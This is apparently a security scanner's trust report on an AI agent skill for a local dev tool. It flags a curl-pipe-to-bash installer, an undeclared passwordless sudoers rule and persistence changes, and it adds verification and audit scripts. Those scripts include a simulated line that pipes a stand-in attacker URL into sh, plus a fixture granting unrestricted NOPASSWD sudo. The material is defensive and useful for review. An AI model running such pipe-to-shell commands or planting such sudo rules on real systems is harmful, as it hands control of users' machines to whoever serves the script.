Skill Trust Decision

rundev-local-dev

The skill documents a legitimate local development tool, but it is installed by piping a remote script into bash, and that installer makes opaque system-level changes, including a permanent NOPASSWD sudo rule.

Install decision first · Source: Manual upload · Scanned: Apr 4, 2026
Files 1
Artifacts 6
Violations 1
Findings 5
Most direct threat evidence
01 · User executes curl|bash installation command · Entry · SKILL.md
02 · Remote server serves potentially malicious install.sh · Delivery · https://getrun.dev/install.sh
03 · Install script executes with sudo privileges, creates NOPASSWD rule · Escalation · install.sh (hidden)

Why this conclusion was reached

3/4 dimensions flagged
Block
Declared vs actual capability

1 undeclared or violating capability was inferred.

Block
Hidden execution and egress

1 high-risk artifact or egress signal was extracted.

Block
Attack chain and severe findings

The report includes 5 attack-chain steps and 3 severe findings.

Review
Dependencies and supply chain hygiene

Dependency information is incomplete, so supply-chain confidence stays limited.

Attack Chain

01
User executes curl|bash installation command

Entry · SKILL.md:83

02
Remote server serves potentially malicious install.sh

Delivery · https://getrun.dev/install.sh:1

03
Install script executes with sudo privileges, creates NOPASSWD rule

Escalation · install.sh (hidden):unknown

04
Binary installed to /usr/local/bin, iptables rules set up, hosts modified

Persistence · install.sh (hidden):unknown

05
Malicious binary with permanent sudo access runs with elevated privileges

Impact · /usr/local/bin/rundev:unknown

What drove the risk score up

Dangerous installation pattern (curl|bash) +25

Line 83: Remote script piped directly to bash - classic supply chain attack vector

Undeclared NOPASSWD sudoers rule +15

Installer creates a passwordless sudo rule that the skill never declares as a capability

Opaque install.sh script +10

Install script contents not visible - hidden functionality risk

Prebuilt binary without verification +5

Binary downloaded from a remote URL with no source build and no checksum or signature verification
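The two supply-chain items above (the piped installer and the unverified binary) share one fix: fetch to disk, pin to a digest obtained through a separate channel, read the script, and only then run it. The script below is an added example, not code from the skill, the getrun.dev project or the scanner; the URL and digest arguments are placeholders, and the demo at the bottom uses a constructed installer so it runs offline.

```shell
#!/bin/sh
# Added example, not code from the skill or from the scanner: the safe form of
# the flagged `curl -fsSL https://getrun.dev/install.sh | bash`. The installer
# is fetched to disk, pinned to a SHA-256 obtained through a separate channel,
# read, and only then executed. The demo at the bottom uses a constructed
# installer so it runs offline; the URL and digest arguments are placeholders.

# SHA-256 of a file; works with GNU coreutils (sha256sum) and macOS/BSD (shasum).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Compare a staged file against the expected digest. Returns 0 on match and 1 on
# mismatch. It never executes the file, so a substituted installer is refused
# before it can do anything.
verify_installer() {
    file=$1
    expected=$2
    actual=$(sha256_of "$file")
    if [ "$actual" = "$expected" ]; then
        return 0
    fi
    echo "checksum mismatch for $file" >&2
    echo "  expected: $expected" >&2
    echo "  actual:   $actual" >&2
    return 1
}

# Replacement for the one-liner: download, verify, review, run. Not called in
# the demo; it needs network access and a digest you already trust.
staged_install() {
    url=$1
    expected=$2
    out=${3:-install.sh}
    curl -fsSL --proto '=https' --tlsv1.2 "$url" -o "$out" || return 1
    verify_installer "$out" "$expected" || return 1
    "${PAGER:-less}" "$out"            # read the whole script before anything runs
    sh "$out"
}

# Constructed demo (no network): a trusted digest matches, a tampered copy does not.
tmp=$(mktemp -d)
printf '#!/bin/sh\necho "installing rundev"\n' > "$tmp/install.sh"
pinned=$(sha256_of "$tmp/install.sh")          # stands in for a digest published out of band
verify_installer "$tmp/install.sh" "$pinned" && echo "ok: installer matches pinned digest"
printf 'curl -s https://attacker.invalid/x | sh\n' >> "$tmp/install.sh"   # simulated swap
verify_installer "$tmp/install.sh" "$pinned" || echo "refused: installer differs from pinned digest"
rm -rf "$tmp"
```

The digest has to come from somewhere other than the server that serves the script (a signed release page, a checksum committed to the GitHub source the positives section mentions); a checksum file downloaded from the same host adds nothing, because whoever can swap the script can swap the checksum too.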

Most important evidence

High Supply Chain

Dangerous curl|bash Installation Pattern

Line 83 executes a remote script directly from getrun.dev without any verification. This is a well-known attack vector: the server can return different content per request (for example keyed on the User-Agent, or on detecting that the response is being consumed by a shell rather than saved to disk), so what a reviewer downloads and reads need not be what a user executes, which enables a targeted supply-chain compromise.

SKILL.md:83
Download the install script first with 'curl -fsSL https://getrun.dev/install.sh -o install.sh', review contents, then execute locally.
High Priv Escalation

Undeclared Permanent Sudoers Rule

The installer creates a NOPASSWD sudoers rule for hosts-file management. This grants permanent elevated privileges without declaring them as a capability; the rule persists across reboots and could be abused. Because the rule targets a binary under /usr/local/bin, anyone able to write to that path (a common situation on macOS, where package managers leave it user-owned) can run arbitrary code as root without a password.

SKILL.md:86
Review the installed sudoers rules (visudo -c validates syntax; check /etc/sudoers and every file under /etc/sudoers.d), confirm the target binary and its directory are root-owned and not group- or world-writable, and prefer a narrowly scoped rule or a per-invocation sudo prompt over a permanent NOPASSWD grant.
High Doc Mismatch

Hidden Installation Script Contents

The SKILL.md describes what the installer does but the actual install.sh script contents are not visible. Users cannot verify what commands will actually execute, including potential data collection or additional downloads.

SKILL.md:84
Provide the full install.sh script content in the skill documentation for transparency and verification.
Medium Supply Chain

Unverified Prebuilt Binary Download

The installer downloads a prebuilt binary from getrun.dev with no checksum verification. An attacker compromising the domain could serve a malicious binary.

SKILL.md:85
Use the source-based installation: 'git clone && make install', pinned to a tagged release or commit you have reviewed, so the binary you run is built from source you can inspect.
Medium Persistence

System-Level Persistence Mechanisms

Installer sets up persistent configurations: iptables NAT rules (Linux), pfctl anchors (macOS), hosts file modifications, and state persistence in state.json. Each of these survives a reboot and creates a separate persistence vector that a partial uninstall can leave behind.

SKILL.md:86
Document all persistence mechanisms clearly and provide easy uninstall to remove all traces.
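A user who has already run the installer can check the two findings above (the sudoers rule and the hosts-file edits) directly. The audit below is an added example, not code from the skill or the scanner; it runs on constructed fixtures so it works offline, and the rule text and host names in those fixtures are assumptions about the shape such changes take, not the installer's actual output. On a real host, call the functions with /etc/sudoers, /etc/sudoers.d and /etc/hosts (reading sudoers requires root).

```shell
#!/bin/sh
# Added example, not the skill's or the scanner's code: a post-install audit for
# the two system changes this report flags, a NOPASSWD sudoers rule and extra
# /etc/hosts entries. The audit runs on constructed files here; on a real host
# call it with /etc/sudoers, /etc/sudoers.d and /etc/hosts. The rule text and
# host names in the fixtures are assumptions, not the installer's actual output.

# Print every NOPASSWD rule found in the given sudoers files or directories,
# one per line, with comment lines dropped first so "NOPASSWD" in a comment
# does not count.
nopasswd_rules() {
    grep -rhv '^[[:space:]]*#' "$@" 2>/dev/null | grep 'NOPASSWD' || true
}

# The worst case: a rule that allows ALL commands without a password.
unrestricted_nopasswd() {
    nopasswd_rules "$@" | grep -E 'NOPASSWD:[[:space:]]*ALL([[:space:]]|$)' || true
}

# Hosts entries that are not comments and not the stock loopback/broadcast lines.
# Whatever this prints is what an uninstall must remove.
extra_hosts_entries() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" \
      | grep -Ev '^(127\.0\.0\.1|::1|255\.255\.255\.255|fe80::1%lo0|ff0[02]::[0-9])[[:space:]]+(localhost|localhost\.localdomain|broadcasthost|ip6-(localhost|loopback|localnet|mcastprefix|allnodes|allrouters))([[:space:]]|$)' \
      || true
}

# Constructed fixtures standing in for /etc/sudoers, /etc/sudoers.d and /etc/hosts.
fixture=$(mktemp -d)
mkdir "$fixture/sudoers.d"
cat > "$fixture/sudoers" <<'EOF'
# A comment mentioning NOPASSWD must not be reported
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
EOF
cat > "$fixture/sudoers.d/rundev" <<'EOF'
# hypothetical rule shape an installer might drop for hosts-file management
alice ALL=(root) NOPASSWD: /usr/local/bin/rundev hosts
EOF
cat > "$fixture/sudoers.d/legacy" <<'EOF'
bob ALL=(ALL) NOPASSWD: ALL
EOF
cat > "$fixture/hosts" <<'EOF'
127.0.0.1       localhost
::1             localhost
255.255.255.255 broadcasthost
# added by a local dev tool (constructed)
127.0.0.1       api.myapp.local
127.0.0.1       app.myapp.local
EOF

echo "== NOPASSWD rules =="
nopasswd_rules "$fixture/sudoers" "$fixture/sudoers.d"
echo "== unrestricted NOPASSWD rules =="
unrestricted_nopasswd "$fixture/sudoers" "$fixture/sudoers.d"
echo "== non-stock hosts entries =="
extra_hosts_entries "$fixture/hosts"
rm -rf "$fixture"
```

The firewall side of the same finding is listed rather than parsed: `iptables -t nat -S` prints the NAT rules in iptables-save syntax on Linux, and `pfctl -s Anchors` lists the loaded anchors on macOS, so both can be compared before and after the uninstall command the skill provides.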

Declared capability vs actual capability

Filesystem · Pass · Declared WRITE · Inferred WRITE · SKILL.md:80-85 - /usr/local/bin, /etc/hosts, ~/.config/rundev/
Shell · Pass · Declared WRITE · Inferred WRITE · SKILL.md:83 - curl|bash execution
Network · Block · Declared READ · Inferred WRITE · SKILL.md:83 - Downloads binary from getrun.dev
Environment · Pass · Declared NONE · Inferred NONE · No environment access declared or observed
Skill Invoke · Pass · Declared NONE · Inferred NONE · No cross-skill invocation
Clipboard · Pass · Declared NONE · Inferred NONE · No clipboard access
Browser · Pass · Declared NONE · Inferred NONE · No browser automation
Database · Pass · Declared NONE · Inferred NONE · No database access

Suspicious artifacts and egress

Critical Dangerous Command
curl -fsSL https://getrun.dev/install.sh | bash

SKILL.md:83

Medium External URL
https://getrun.dev

SKILL.md:22

Medium External URL
https://getrun.dev/install.sh

SKILL.md:83

Medium External URL
https://api.myapp.local

SKILL.md:193

Medium External URL
https://docs.anthropic.com/en/docs/claude-code

SKILL.md:257

Info Email
[email protected]

SKILL.md:21

Dependencies and supply chain

There are no structured dependency warnings.

File composition

1 files · 323 lines
Markdown 1 files · 323 lines
Files of concern · 1
SKILL.md Markdown · 323 lines
Dangerous curl|bash Installation Pattern · Undeclared Permanent Sudoers Rule · Hidden Installation Script Contents · Unverified Prebuilt Binary Download · System-Level Persistence Mechanisms · curl -fsSL https://getrun.dev/install.sh | bash · https://getrun.dev · https://getrun.dev/install.sh · https://api.myapp.local · https://docs.anthropic.com/en/docs/claude-code · [email protected]

Security positives

Full documentation of what the installer does (though script content is hidden)
Includes automatic rollback on failure
Network rules are localhost-only (127.0.0.1)
Explicit consent screen before system changes
Provides uninstall command to reverse all changes
Source code available on GitHub for verification (though not used by default install)